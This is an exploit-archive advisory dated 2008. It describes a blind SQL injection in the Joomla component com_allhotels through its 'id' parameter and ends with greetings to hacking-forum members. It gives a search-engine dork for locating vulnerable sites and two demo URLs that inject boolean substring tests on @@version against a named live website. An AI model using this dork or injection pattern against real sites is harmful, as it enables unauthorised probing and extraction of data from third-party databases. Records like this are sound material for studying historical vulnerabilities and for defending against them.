[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability
# Published : 2008-12-23
# Author : Hussin X
# Previous Title : Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln
# Next Title : RSS Simple News (news.php pid) Remote SQL Injection Exploit


Joomla Component com_allhotels (id)  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script  : http://www.joomlahbs.com/  &  http://www.leveltensolutions.net/spa/

DorK : inurl:index.php?option=com_allhotels

Demo :
_______


http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5

http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4
____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K|
|_____________________________________________________________________

 _____   ____   __   __     _       ____        ____    ____
|_   _| |  _     / /    /      / ___|      / ___|  / ___|
  | |   | |_) |   V /    / _    | |  _      | |     | |
  | |   |  _ <    | |    / ___   | |_| |  _  | |___  | |___
  |_|   |_| _   |_|   /_/   _  ____| (_)  ____|  ____|

# www.Syue.com [2008-12-23]